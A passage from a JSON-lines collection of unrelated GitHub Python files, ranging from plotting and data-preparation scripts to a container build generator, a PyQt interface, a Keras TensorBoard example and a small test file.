poly.set_edgecolor('black')\n poly.set_linewidth(0.25)\n\n # and now -- visualization!\n ax = fig.add_subplot(2,3,tmp_depth + 1, projection='3d')\n 
ax.add_collection3d(poly)\n\n # Add steering points\n\n # Extract steering points\n # if tmp_depth == 1:\n # # steer_neigh = [8, 31, 30, 40, 39, 41] # Children of 8\n # steer_neigh = [7, 17, 8, 30, 39, 28]\n # steer_neigh_points = vertices_np[steer_neigh]\n # else:\n # steer_neigh = steer_neigh_list[tmp_depth]\n # steer_neigh_points = vertices_np[steer_neigh]\n\n steer_neigh = steer_neigh_list[tmp_depth]\n steer_neigh_points = vertices_np[steer_neigh]\n\n ax.scatter(steer_neigh_points[:, 0], steer_neigh_points[:, 1], steer_neigh_points[:, 2], color='r')\n # print(\"Points: \")\n # for steering_points in steer_neigh_points:\n # print(\"(\", steering_points, \")\", end=\" \")\n\n ax.set_xlim(-1,1)\n ax.set_ylim(-1,1)\n ax.set_zlim(-1,1)\n\n ax.set_xticks([-1,0,1])\n ax.set_yticks([-1,0,1])\n ax.set_zticks([-1,0,1])\n\n ax.set_title(f'nu={tmp_depth + 1}')\n fig.suptitle('Icospheres with different subdivision frequency')\n\n plt.show()\n # print(\"Icosphere vertices are saved ... \", icosphere_vertices.shape)\n # print(\"Test\")\n\nif __name__ == '__main__':\n parser = argparse.ArgumentParser(description='Execute generate_icosphere_vertices')\n\n parser.add_argument('--ico_depth', metavar='ico_depth', type=int, default=3)\n args = parser.parse_args()\n\n try:\n # sys.exit(main(args.use_sslr, args.use_dcase, args.epoch, args.batch, args.model_version))\n sys.exit(main(args.ico_depth))\n except (ValueError, IOError) as e:\n sys.exit(e)","repo_name":"InkyuAn/MicPairTrain","sub_path":"utils/generate_icosphere_vertices.py","file_name":"generate_icosphere_vertices.py","file_ext":"py","file_size_in_byte":5870,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"35604714244","text":"import glob\nimport os\nimport shutil\nfrom pathlib import Path\n\nfrom bs4 import BeautifulSoup as bs4\n\n\ndef copy_driver(path: str,\n outfile: str,\n clever_naming=True,\n is_xml=False):\n if is_xml:\n results = os.path.join(path, 'result.xml')\n else:\n results = os.path.join(path, 'result.json')\n res_obj = Path(results)\n # res_path = res_obj.name\n new_name = res_obj.parts[-2] # extracts filename from results just in case\n if clever_naming:\n with open(results, encoding='utf-8') as file:\n soup = bs4(file, 'lxml')\n new_name = soup.find('package').string\n if is_xml:\n cp_result = os.path.join(outfile, f'{new_name}.xml')\n else:\n cp_result = os.path.join(outfile, f'{new_name}.json')\n # cp_path = Path(cp_result)\n # print(f'Copying {res_obj} to {cp_path}')\n shutil.copyfile(results, cp_result)\n\n\ndef copy(path: str, outfile: str,\n clever_naming=True,\n is_xml=False):\n if not os.path.isdir(outfile):\n try:\n os.mkdir(outfile)\n except OSError:\n pass\n copy_driver(path, outfile, clever_naming=clever_naming, is_xml=is_xml)\n\n\ndef bulkcopy(path: str, outfile: str,\n clever_naming=True, is_xml=False) -> None:\n globpath = os.path.join(path, '*', '')\n dirs = glob.glob(globpath)\n target = os.path.join(path, outfile, '')\n print(f'Copying results to {target}.')\n failures = 0\n if not os.path.isdir(target):\n try:\n os.mkdir(target) # create directory if it doesn't exist\n except OSError:\n # print(f'error creating {target}')\n pass\n if target in dirs:\n dirs.remove(target) # remove from list\n # print(dirs)\n for dir in dirs:\n try:\n copy_driver(dir, outfile,\n clever_naming=clever_naming, is_xml=is_xml)\n except FileNotFoundError as fnfe:\n failures += 1\n print(fnfe)\n if failures > 0:\n print(f'{len(dirs)} directories found, {failures} errors.')\n 
else:\n print(f'Operation completed successfully on {len(dirs)} files.')\n","repo_name":"AnonMuk/static-analyzer","sub_path":"copier.py","file_name":"copier.py","file_ext":"py","file_size_in_byte":2178,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32008439794","text":"#count down\ndef count_down(num):\n list = []\n for i in range(0, num+1):\n list.append(num)\n num -= 1\n return list\n\nprint(count_down(6))\n\n#print and return\ndef print_and_return(list):\n print(list[0])\n return list[1]\n\nprint(print_and_return([3, 9]))\n\n#first plus length\ndef first_plus_length(list):\n return list[0]+len(list)\n\nprint(first_plus_length([2, 6, 8]))\n\n#values greater than second\ndef greater_than(list):\n new_list=[]\n num=0\n for i in range(0, len(list)):\n if list[i] > list[1]:\n new_list.append(list[i])\n num += 1\n print(str(num) + \" value(s) are greater than index 2\")\n return new_list\n\ngreater_than([2, 3, 4])\n\n#This length, that value\ndef len_and_value(length, value):\n list = []\n for i in range(length):\n list.append(value)\n # print(list)\n return list\n\nlen_and_value(3, 7)","repo_name":"woox99/Python","sub_path":"10_Assignments/60_Function_Basic_II/file.py","file_name":"file.py","file_ext":"py","file_size_in_byte":878,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"39626788876","text":"s = input()\ncount = 0\n\nt= int(input())\nwhile(t!=0):\n if len(s)%2 !=0 :\n #print(len(s))\n print(\"NET\")\n\n else:\n #i = 1\n x = list(s)\n for i in range(1,len(x)):\n #print(abs(int(s[i])-int(s[i-1])))\n if abs(int(x[i])-int(x[i-1]))==1:\n \n del(x[i],x[i-1])\n count = count+1\n print(count)\n\n if count%2!=0:\n print(\"DA\")\n\n else:\n print(\"NET\")\n t = t-1 ","repo_name":"sandilya761/Codeforces","sub_path":"1373B:01game.py","file_name":"1373B:01game.py","file_ext":"py","file_size_in_byte":509,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"73789328088","text":"import pandas as pd\nimport numpy as np\nimport os\nimport h5py\nimport sys\nsys.path.append('../')\nfrom common_fcns import combine_all_coils, resize_scan, k_encode, quantize\n\nif __name__ == '__main__':\n # Load in the scans, compute k_encoding, save off\n data_dir = '../data/multicoil_test/'\n train_slice_name = []\n train_slice_wavelet = []\n train_slice_image = []\n test_slice_name = []\n test_slice_wavelet = []\n test_slice_image = []\n K = 3000 #fix K for 'good' value\n #iterate through directory\n ii = 0\n for file in os.listdir(data_dir):\n print(\"Processing Scan \"+str(ii))\n f = os.path.join(data_dir, file)\n hf = h5py.File(f)\n volume_kspace = hf['kspace'][()]\n n_slices = volume_kspace.shape[0]\n filename = file.split('.')\n for slice_idx in range(n_slices):\n X_raw = combine_all_coils(volume_kspace,slice_idx)\n X = resize_scan(X_raw)\n X_encode = np.array(k_encode(K,X)).flatten()\n X = np.array(X).flatten()\n if filename[0]=='file_brain_AXT2_200_2000482':\n test_slice_name.append(filename[0]+'_'+str(slice_idx))\n test_slice_wavelet.append(quantize(X_encode))\n test_slice_image.append(quantize(X))\n else:\n train_slice_name.append(filename[0]+'_'+str(slice_idx))\n train_slice_wavelet.append(quantize(X_encode))\n train_slice_image.append(quantize(X))\n #print(X_encode.shape)\n ii+=1\n\n # Make a nice DataFrame of the samples\n train_d = {'slice_name': train_slice_name, 'slice': train_slice_wavelet}\n train_df = 
pd.DataFrame(data=train_d)\n train_result = train_df.to_json(r'../data/train_set_wavelet.json')\n test_d = {'slice_name': test_slice_name, 'slice': test_slice_wavelet}\n test_df = pd.DataFrame(data=test_d)\n test_result = test_df.to_json(r'../data/test_set_wavelet.json')\n\n # Make DFs of the pre-wavelet images\n train_d = {'slice_name': train_slice_name, 'slice': train_slice_image}\n train_df = pd.DataFrame(data=train_d)\n train_result = train_df.to_json(r'../data/train_set_image.json')\n test_d = {'slice_name': test_slice_name, 'slice': test_slice_image}\n test_df = pd.DataFrame(data=test_d)\n test_result = test_df.to_json(r'../data/test_set_image.json')\n\n ","repo_name":"athornton1618/MRI_Compression","sub_path":"utils/prepare_data.py","file_name":"prepare_data.py","file_ext":"py","file_size_in_byte":2361,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"2466991690","text":"def FizzBuzz():\n for i in range(100):\n if i % 3 == 0 and i % 5 == 0:\n print(\"FizzBuzz\")\n elif i % 3 == 0:\n print(\"Fizz\")\n elif i % 5 == 0:\n print(\"Buzz\")\n else:\n print(i)\n\ndef loopTest():\n for n in range(1, 11):\n print(n)\n\ndef loopTestBy2():\n for n in range(0, 11, 2):\n print(n)\n\ndef loopTestBackwards():\n for n in range(10, 0, -1):\n print(n)\n\nloopTestBackwards()","repo_name":"andrewsloss/python-code-library","sub_path":"PythonBasics/ForLoops.py","file_name":"ForLoops.py","file_ext":"py","file_size_in_byte":468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"26046450141","text":"import sys\nfrom typing import Tuple, List, Dict, Union\n\nimport hpccm\nfrom hpccm.primitives import shell, environment\nfrom hpccm.building_blocks.packages import packages\nfrom hpccm.building_blocks.cmake import cmake\nfrom hpccm.building_blocks.gnu import gnu\nfrom hpccm.building_blocks.llvm import llvm\nfrom hpccm.templates.git import git\nfrom hpccm.templates.CMakeBuild import CMakeBuild\n\ndef add_alpaka_dep_layer(stage : hpccm.Stage, ubuntu_version : str,\n cuda_support : bool, extra_compiler : List[str],\n alpaka=False) -> bool:\n \"\"\"Add all dependencies to an hpccm stage that are necessary to build and run Alpaka.\n\n :param stage: At least a baseimage\n :type stage: hpccm.Stage\n :param ubuntu_version: Ubuntu version number: '16.04' or '18.04'\n :type ubuntu_version: str\n :param cuda_support: Set True, if the Stage supports CUDA\n :type cuda_support: bool\n :param extra_compiler: List of compilers, which are installed additional to the system compiler. 
Supported are: gcc:[5-9], clang:[5.0-7.0, 8-9]\n :type extra_compiler: str\n :param alpaka: install alpaka in /usr/local\n :type alpaka: bool\n :returns: Returns True if function was successful\n :rtype: bool\n\n \"\"\"\n if ubuntu_version != '16.04' and ubuntu_version != '18.04':\n print('not supported Ubuntu version: ' + ubuntu_version, file=sys.stderr)\n print('supported are: 16.04, 18.04', file=sys.stderr)\n return False\n\n apt_package_list = ['gcc', 'g++', 'make', 'software-properties-common',\n 'wget', 'libc6-dev', 'libomp-dev', 'unzip', 'git']\n\n if ubuntu_version == '16.04':\n apt_package_list.append('gnupg-agent')\n if ubuntu_version == '18.04':\n apt_package_list.append('gpg-agent')\n\n stage += packages(ospackages=apt_package_list)\n\n stage += cmake(eula=True, version='3.16.0')\n\n # install extra compiler\n if extra_compiler is not None:\n for com in extra_compiler:\n if com.startswith('gcc'):\n stage += gnu(extra_repository=True, version=com[len('gcc:'):])\n if com.startswith('clang'):\n add_clang(stage, ubuntu_version, version=com[len('clang:'):])\n\n #install boost\n stage += shell(commands=['add-apt-repository -y ppa:mhier/libboost-latest'])\n stage += packages(ospackages=['boost1.67'])\n\n if cuda_support:\n stage += environment(\n variables={'LD_LIBRARY_PATH': '$LD_LIBRARY_PATH:/usr/local/cuda/lib64'})\n # alpaka use a function direct from the cuda driver library\n # in the container, the cuda libraries are not at the default path\n stage += environment(\n variables={'LIBRARY_PATH': '$LIBRARY_PATH:/usr/local/cuda/lib64/stubs'})\n stage += environment(\n variables={'CMAKE_PREFIX_PATH': '/usr/local/cuda/lib64/stubs/'})\n\n if alpaka:\n git_alpaka = git()\n cmake_alpaka = CMakeBuild()\n alpaka_commands = []\n alpaka_commands.append(git_alpaka.clone_step(\n repository='https://github.com/alpaka-group/alpaka.git',\n path='/opt'))\n alpaka_commands.append(cmake_alpaka.configure_step(build_directory='build',\n directory='/opt/alpaka',\n opts=['-Dalpaka_BUILD_EXAMPLES=OFF',\n '-DBUILD_TESTING=OFF']))\n alpaka_commands.append(cmake_alpaka.build_step(target='install'))\n alpaka_commands.append('rm -rf /opt/alpaka')\n\n stage += shell(commands=alpaka_commands)\n\n return True\n\ndef add_clang(stage : hpccm.Stage, ubuntu_version : str, version : str):\n \"\"\"Add commands to stage to install clang.\n\n :param stage: hpccm Stage\n :type stage: hpccm.Stage\n :param ubuntu_version: Ubuntu version number: '16.04' or '18.04'\n :type ubuntu_version: str\n :param version: Clang version: 5.0 - 7.0 or 8 - 9\n :type version: str\n\n \"\"\"\n if ubuntu_version == '16.04':\n distro_name = 'xenial'\n elif ubuntu_version == '18.04':\n distro_name = 'bionic'\n else:\n print('clang error: unsupported Ubuntu version: ' + ubuntu_version, file=sys.stderr)\n print('supported Ubuntu version: 16.04, 18.04', file=sys.stderr)\n return\n\n # clang/llvm changed its name pattern and the ppa sources with clang 8\n # https://apt.llvm.org/\n ppa_version = '' if float(version) < 8.0 else '-' + str(version)\n\n stage += shell(commands=['wget http://llvm.org/apt/llvm-snapshot.gpg.key',\n\t 'apt-key add llvm-snapshot.gpg.key',\n\t 'rm llvm-snapshot.gpg.key',\n\t 'echo \"\" >> /etc/apt/sources.list',\n\t 'echo \"deb http://apt.llvm.org/' + distro_name +\n '/ llvm-toolchain-' + distro_name + ppa_version + ' main\" >> /etc/apt/sources.list',\n 'echo \"deb-src http://apt.llvm.org/' + distro_name +\n '/ llvm-toolchain-' + distro_name + ppa_version + ' main\" >> /etc/apt/sources.list'\n ])\n stage += 
llvm(version=str(version))\n","repo_name":"ComputationalRadiationPhysics/crp-container","sub_path":"Alpaka/generator.py","file_name":"generator.py","file_ext":"py","file_size_in_byte":5226,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"31"} +{"seq_id":"24247830138","text":"from PyQt5.QtGui import QFont\nfrom PyQt5.QtWidgets import (\n QMainWindow,\n QVBoxLayout,\n QHBoxLayout,\n QSpacerItem,\n QSizePolicy,\n QGridLayout,\n QPushButton,\n QScrollArea,\n QTabWidget,\n QGroupBox,\n QMenuBar,\n QWidget,\n QAction,\n QMenu\n)\nfrom PyQt5.QtCore import (\n QMetaObject,\n QSize,\n QRect,\n Qt\n)\n\nfrom ..constants import *\n\n\nclass Ui_MainWindow(object):\n def setupUi(self, MainWindow: QMainWindow):\n MainWindow.setWindowTitle(\"Browse Games\")\n MainWindow.setObjectName(\"MainWindow\")\n MainWindow.resize(MAIN_WD, MAIN_HT)\n MainWindow.setMinimumSize(QSize(MAIN_WD, MAIN_HT))\n MainWindow.setMaximumSize(QSize(MAIN_WD, MAIN_HT))\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_DEFAULT)\n MainWindow.setFont(font)\n MainWindow.setStyleSheet(f\"\"\"\\\nQGroupBox {{\n color: #849db8;\n border: 1px solid #849db8;\n font-family: {FONT_FAMILY};\n padding: {PAD*2}px {PAD}px {PAD}px {PAD}px;\n margin-top: 1em;\n}}\nQGroupBox::title {{\n subcontrol-origin: margin;\n subcontrol-position: {GBOX_POSITION};\n left: {GBOX_OFFSET};\n}}\"\"\")\n\n self.centralwidget = QWidget(MainWindow)\n self.centralwidget.setObjectName(\"centralwidget\")\n self.vLayout_centralwidget = QVBoxLayout(self.centralwidget)\n self.vLayout_centralwidget.setContentsMargins(PAD, PAD, PAD, PAD)\n self.vLayout_centralwidget.setSpacing(PAD)\n self.vLayout_centralwidget.setObjectName(\"vLayout_centralwidget\")\n\n self.hLayout_search = QHBoxLayout()\n self.hLayout_search.setSpacing(0)\n self.hLayout_search.setObjectName(\"hLayout_search\")\n spacerItem = QSpacerItem(\n 40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n self.hLayout_search.addItem(spacerItem)\n self.gBox_search = QGroupBox(self.centralwidget)\n self.gBox_search.setTitle(\"Search\")\n sizePolicy = QSizePolicy(\n QSizePolicy.Fixed, QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n self.gBox_search.sizePolicy().hasHeightForWidth())\n self.gBox_search.setSizePolicy(sizePolicy)\n self.gBox_search.setMinimumSize(\n QSize(SEARCH_MIN_WD, SEARCH_MIN_HT))\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_MAX)\n font.setBold(True)\n font.setWeight(75)\n self.gBox_search.setFont(font)\n self.gBox_search.setStyleSheet(f\"\"\"\\\nQComboBox {{\n font-size: {FONT_SZ_DEFAULT}pt;\n font-family: {FONT_FAMILY};\n height: 1.5em;\n}}\nQCheckBox {{\n font-size: {FONT_SZ_DEFAULT}pt;\n font-family: {FONT_FAMILY};\n}}\nQPushButton {{color: #849db8;}}\"\"\")\n self.gBox_search.setObjectName(\"gBox_search\")\n\n self.vLayout_gbox_search = QVBoxLayout(self.gBox_search)\n self.vLayout_gbox_search.setContentsMargins(PAD, PAD*3, PAD, PAD)\n self.vLayout_gbox_search.setSpacing(PAD)\n self.vLayout_gbox_search.setObjectName(\"vLayout_gbox_search\")\n\n self.gBox_search_categories = QGroupBox(self.gBox_search)\n self.gBox_search_categories.setTitle(\"Categories\")\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_HEADER)\n self.gBox_search_categories.setFont(font)\n self.gBox_search_categories.setObjectName(\"gBox_search_categories\")\n self.gLayout_search_categories = QGridLayout(\n 
self.gBox_search_categories)\n self.gLayout_search_categories.setContentsMargins(PAD, PAD*2, PAD, PAD)\n self.gLayout_search_categories.setObjectName(\n \"gLayout_search_categories\")\n self.vLayout_gbox_search.addWidget(self.gBox_search_categories)\n\n self.gBox_search_tags = QGroupBox(self.gBox_search)\n self.gBox_search_tags.setTitle(\"Tags\")\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_HEADER)\n self.gBox_search_tags.setFont(font)\n self.gBox_search_tags.setObjectName(\"gBox_search_tags\")\n self.gLayout_search_tags = QGridLayout(self.gBox_search_tags)\n self.gLayout_search_tags.setContentsMargins(PAD, PAD, PAD, PAD)\n self.gLayout_search_tags.setSpacing(PAD)\n self.gLayout_search_tags.setObjectName(\"gLayout_search_tags\")\n self.vLayout_gbox_search.addWidget(self.gBox_search_tags)\n self.hLayout_search_btns = QHBoxLayout()\n self.hLayout_search_btns.setSpacing(0)\n self.hLayout_search_btns.setObjectName(\"hLayout_search_btns\")\n\n self.btn_search_clear = QPushButton(\"Clear\", self.gBox_search)\n sizePolicy = QSizePolicy(\n QSizePolicy.Fixed, QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n self.btn_search_clear.sizePolicy().hasHeightForWidth())\n self.btn_search_clear.setSizePolicy(sizePolicy)\n self.btn_search_clear.setObjectName(\"btn_search_clear\")\n self.hLayout_search_btns.addWidget(self.btn_search_clear)\n\n self.btn_search_search = QPushButton(\"Search\", self.gBox_search)\n sizePolicy = QSizePolicy(\n QSizePolicy.Fixed, QSizePolicy.Fixed)\n sizePolicy.setHorizontalStretch(0)\n sizePolicy.setVerticalStretch(0)\n sizePolicy.setHeightForWidth(\n self.btn_search_search.sizePolicy().hasHeightForWidth())\n self.btn_search_search.setSizePolicy(sizePolicy)\n self.btn_search_search.setObjectName(\"btn_search_search\")\n self.hLayout_search_btns.addWidget(self.btn_search_search)\n self.vLayout_gbox_search.addLayout(self.hLayout_search_btns)\n self.hLayout_search.addWidget(self.gBox_search)\n spacerItem1 = QSpacerItem(\n 40, 20, QSizePolicy.Expanding, QSizePolicy.Minimum)\n self.hLayout_search.addItem(spacerItem1)\n self.vLayout_centralwidget.addLayout(self.hLayout_search)\n\n self.tabWidget = QTabWidget(self.centralwidget)\n font = QFont()\n font.setFamily(FONT_FAMILY)\n font.setPointSize(FONT_SZ_TITLE)\n self.tabWidget.setFont(font)\n self.tabWidget.setTabShape(QTabWidget.Triangular)\n self.tabWidget.setObjectName(\"tabWidget\")\n\n (self.tab_rPlayed,\n self.hLayout_tab_rPlayed,\n self.scrollArea_tab_rPlayed,\n self.scrollAreaContents_tab_rPlayed,\n self.vLayout_tab_rPlayed) = self.createTab(tab_name='rPlayed',\n tab_title='Recently Played')\n\n (self.tab_rUpdated,\n self.hLayout_tab_rUpdated,\n self.scrollArea_tab_rUpdated,\n self.scrollAreaContents_tab_rUpdated,\n self.vLayout_tab_rUpdated) = self.createTab(tab_name=\"rUpdated\",\n tab_title=\"Recently Updated\")\n\n (self.tab_rAdded,\n self.hLayout_tab_rAdded,\n self.scrollArea_tab_rAdded,\n self.scrollAreaContents_tab_rAdded,\n self.vLayout_tab_rAdded) = self.createTab(tab_name=\"rAdded\",\n tab_title=\"Recently Added\")\n\n (self.tab_numA,\n self.hLayout_tab_numA,\n self.scrollArea_tab_numA,\n self.scrollAreaContents_tab_numA,\n self.vLayout_tab_numA) = self.createTab(tab_name=\"numA\",\n tab_title=\"#-A\")\n\n (self.tab_BC,\n self.hLayout_tab_BC,\n self.scrollArea_tab_BC,\n self.scrollAreaContents_tab_BC,\n self.vLayout_tab_BC) = self.createTab(tab_name=\"BC\",\n tab_title=\"B-C\")\n\n (self.tab_DE,\n 
self.hLayout_tab_DE,\n self.scrollArea_tab_DE,\n self.scrollAreaContents_tab_DE,\n self.vLayout_tab_DE) = self.createTab(tab_name=\"DE\",\n tab_title=\"D-E\")\n\n (self.tab_FG,\n self.hLayout_tab_FG,\n self.scrollArea_tab_FG,\n self.scrollAreaContents_tab_FG,\n self.vLayout_tab_FG) = self.createTab(tab_name=\"FG\",\n tab_title=\"F-G\")\n\n (self.tab_HI,\n self.hLayout_tab_HI,\n self.scrollArea_tab_HI,\n self.scrollAreaContents_tab_HI,\n self.vLayout_tab_HI) = self.createTab(tab_name=\"HI\",\n tab_title=\"H-I\")\n\n (self.tab_JK,\n self.hLayout_tab_JK,\n self.scrollArea_tab_JK,\n self.scrollAreaContents_tab_JK,\n self.vLayout_tab_JK) = self.createTab(tab_name=\"JK\",\n tab_title=\"J-K\")\n\n (self.tab_LM,\n self.hLayout_tab_LM,\n self.scrollArea_tab_LM,\n self.scrollAreaContents_tab_LM,\n self.vLayout_tab_LM) = self.createTab(tab_name=\"LM\",\n tab_title=\"L-M\")\n\n (self.tab_NO,\n self.hLayout_tab_NO,\n self.scrollArea_tab_NO,\n self.scrollAreaContents_tab_NO,\n self.vLayout_tab_NO) = self.createTab(tab_name=\"NO\",\n tab_title=\"N-O\")\n\n (self.tab_PQR,\n self.hLayout_tab_PQR,\n self.scrollArea_tab_PQR,\n self.scrollAreaContents_tab_PQR,\n self.vLayout_tab_PQR) = self.createTab(tab_name=\"PQR\",\n tab_title=\"P-R\")\n\n (self.tab_ST,\n self.hLayout_tab_ST,\n self.scrollArea_tab_ST,\n self.scrollAreaContents_tab_ST,\n self.vLayout_tab_ST) = self.createTab(tab_name=\"ST\",\n tab_title=\"S-T\")\n\n (self.tab_UV,\n self.hLayout_tab_UV,\n self.scrollArea_tab_UV,\n self.scrollAreaContents_tab_UV,\n self.vLayout_tab_UV) = self.createTab(tab_name=\"UV\",\n tab_title=\"U-V\")\n\n (self.tab_WXYZ,\n self.hLayout_tab_WXYZ,\n self.scrollArea_tab_WXYZ,\n self.scrollAreaContents_tab_WXYZ,\n self.vLayout_tab_WXYZ) = self.createTab(tab_name=\"WXYZ\",\n tab_title=\"W-Z\")\n\n self.vLayout_centralwidget.addWidget(self.tabWidget)\n MainWindow.setCentralWidget(self.centralwidget)\n\n self.menubar = QMenuBar(MainWindow)\n self.menubar.setGeometry(QRect(0, 0, MAIN_WD, 21))\n self.menubar.setObjectName(\"menubar\")\n MainWindow.setMenuBar(self.menubar)\n\n self.menu_new_games = QMenu(\"New Games\", self.menubar)\n self.menu_new_games.setObjectName(\"menu_new_games\")\n self.menubar.addAction(self.menu_new_games.menuAction())\n\n self.menuAction_check = QAction(\"Check for new games\", MainWindow)\n self.menuAction_check.setObjectName(\"menuAction_check\")\n self.menu_new_games.addAction(self.menuAction_check)\n\n self.menuAction_add = QAction(\"Manually Add\", MainWindow)\n self.menuAction_add.setObjectName(\"menuAction_add\")\n self.menu_new_games.addAction(self.menuAction_add)\n\n self.menuAction_add_bundle = QAction(\n \"Add a bundle\", MainWindow)\n self.menuAction_add_bundle.setObjectName(\"menuAction_add_bundle\")\n self.menu_new_games.addAction(self.menuAction_add_bundle)\n\n self.menu_verify = QMenu(\"Verify\", self.menubar)\n self.menu_verify.setObjectName(\"menu_verify\")\n self.menubar.addAction(self.menu_verify.menuAction())\n\n self.menuAction_verify_tags = QAction(\"Tags\", MainWindow)\n self.menuAction_verify_tags.setObjectName(\"menuAction_verify_tags\")\n self.menu_verify.addAction(self.menuAction_verify_tags)\n\n self.menuAction_verify_exes = QAction(\"Executables\", MainWindow)\n self.menuAction_verify_exes.setObjectName(\"menuAction_verify_exes\")\n self.menu_verify.addAction(self.menuAction_verify_exes)\n\n self.tabWidget.setCurrentIndex(0)\n QMetaObject.connectSlotsByName(MainWindow)\n\n def createTab(self, tab_name: str, tab_title: str) -> tuple[QWidget, QHBoxLayout, QScrollArea, 
QWidget, QVBoxLayout]:\n tab = QWidget()\n tab.setObjectName(f\"tab_{tab_name}\")\n\n hLayout = QHBoxLayout(tab)\n hLayout.setContentsMargins(0, 0, 0, 0)\n hLayout.setSpacing(0)\n hLayout.setObjectName(f\"hLayout_tab_{tab_name}\")\n\n scrollArea = QScrollArea(tab)\n scrollArea.setWidgetResizable(True)\n scrollArea.setAlignment(\n Qt.AlignLeading | Qt.AlignLeft | Qt.AlignTop)\n scrollArea.setObjectName(f\"scrollArea_tab_{tab_name}\")\n\n scrollAreaContents = QWidget()\n scrollAreaContents.setGeometry(QRect(0, 0, 98, 28))\n scrollAreaContents.setObjectName(\n f\"scrollAreaContents_tab_{tab_name}\")\n\n vLayout = QVBoxLayout(scrollAreaContents)\n vLayout.setContentsMargins(PAD, PAD, PAD, PAD)\n vLayout.setSpacing(PAD)\n vLayout.setAlignment(Qt.AlignLeading | Qt.AlignLeft | Qt.AlignTop)\n vLayout.setObjectName(f\"vLayout_tab_{tab_name}\")\n\n scrollArea.setWidget(scrollAreaContents)\n hLayout.addWidget(scrollArea)\n self.tabWidget.addTab(tab, tab_title)\n return (tab, hLayout, scrollArea, scrollAreaContents, vLayout)\n","repo_name":"Cryden13/GameBrowser","sub_path":"src/browse/ui_browse.py","file_name":"ui_browse.py","file_ext":"py","file_size_in_byte":13396,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"36753198981","text":"#keras47_tensorboard.py\n\n\nimport numpy as np \nfrom keras.models import Sequential\nfrom keras.layers import Dense, LSTM\n\n# 1. Data \n\na = np.array (range(1,101))\nsize = 5 # time_steps = 4\n\n\ndef split_x (seq, size) :\n aaa = []\n for i in range(len(seq) - size + 1 ) :\n subset = seq[ i: (i + size)]\n aaa.append([item for item in subset]) \n \n return np.array(aaa)\n\n\ndataset = split_x(a,size) #(96, 5)\nprint(type(dataset)) \n\nx =dataset [ :, 0:4] \ny =dataset [ :, 4]\n\n\nx = x.reshape(96,4,1)\ny = y.reshape(96,1)\n\n\n\n# 2. Build the model \n\n# from keras.models import load_model \n# model = load_model('./model/save_keras44.h5')\n\n# keep the model simple so it is easy to read \n\nmodel = Sequential()\nmodel.add(LSTM(5, activation='relu', input_shape = (4,1))) \nmodel.add(Dense(3))\nmodel.add(Dense(1,name = 'out')) \n\n# model.summary()\n\n\n# 3. Training\nfrom keras.callbacks import EarlyStopping, TensorBoard # TensorBoard goes in callbacks! \n\n\ntb_hist = TensorBoard(log_dir = 'graph', histogram_freq = 0, write_graph= True, write_images= True)\n\n'''\n train and validation folders are created under the graph directory \n\n open a terminal and keep cd-ing into the subfolders\n\n once inside the graph directory, run tensorboard --logdir=./path/logs/\n\n open the address in Chrome ( http://localhost:6006/)\n\n fin. \n\n\n always watch your paths! \n\n'''\nearly_stopping= EarlyStopping(monitor='loss', patience= 50, mode = 'auto') \n\n\nmodel.compile(optimizer='adam', loss = 'mse', metrics = ['acc'])\nhist = model.fit(x,y, epochs= 10000, batch_size = 1, callbacks= [early_stopping, tb_hist], validation_split = 0.2 )\n\n\n\n# print(hist)\n# print(hist.history.keys())\n\n\nimport matplotlib.pyplot as plt\n\nplt.plot(hist.history['loss']) # each plot() call adds another line \nplt.plot(hist.history['acc'])\nplt.plot(hist.history['val_acc'])\nplt.plot(hist.history['val_loss'])\n\nplt.title('loss & acc')\nplt.xlabel('epoch')\nplt.ylabel('loss,acc')\nplt.legend(['train loss', 'train acc', 'val acc', 'val loss'])\n# plt.show()\n\n\n\n\n'''\n# 4. 
Evaluation and prediction \n\nloss,mse = model.evaluate(x, y, batch_size = 1) \n\nx_predict = np.array(x) \ny_predict = model.predict(x)\n\nprint('loss :', loss)\nprint('mse :', mse)\n'''","repo_name":"votus777/AI_study","sub_path":"keras/keras47_tensorboard.py","file_name":"keras47_tensorboard.py","file_ext":"py","file_size_in_byte":2245,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"14988072733","text":"from ....testing_tools.context import get_empty_context\nfrom ....testing_tools.mocks import get_context_with_mocks\nfrom ....testing_tools.nodes import render_for_phase_and_shape, Phase, ConfigShape, assert_unsupported\nfrom .....constants import ConstantNamespace\nfrom .....constants.method import TagName\nfrom .....method.loading import load_yaml\n\n\nclass TestParam(ConstantNamespace):\n method_identity = 'path/to::some_method==production'\n user_selection_value = 'some_selection_name'\n state_target = 'state_target'\n\n\ndef test_choice_tag():\n # Phase.EXECUTE, ConfigShape.LIST\n node = load_yaml(\n f'''\n {TagName.Choice}\n - {TagName.SelectionValue}\n - {TestParam.user_selection_value}\n - {TagName.BODY}\n - {TagName.Method}\n - {TagName.IDENTITY} {TestParam.method_identity}\n - {TagName.OUTPUT}\n - {TagName.State}\n {TestParam.state_target}: {TagName.Output} \n '''\n )\n context = get_context_with_mocks()\n output = render_for_phase_and_shape(Phase.EXECUTE, ConfigShape.LIST, node, context)\n assert output[0].result == f'Mock-executed method {TestParam.method_identity}'\n\n 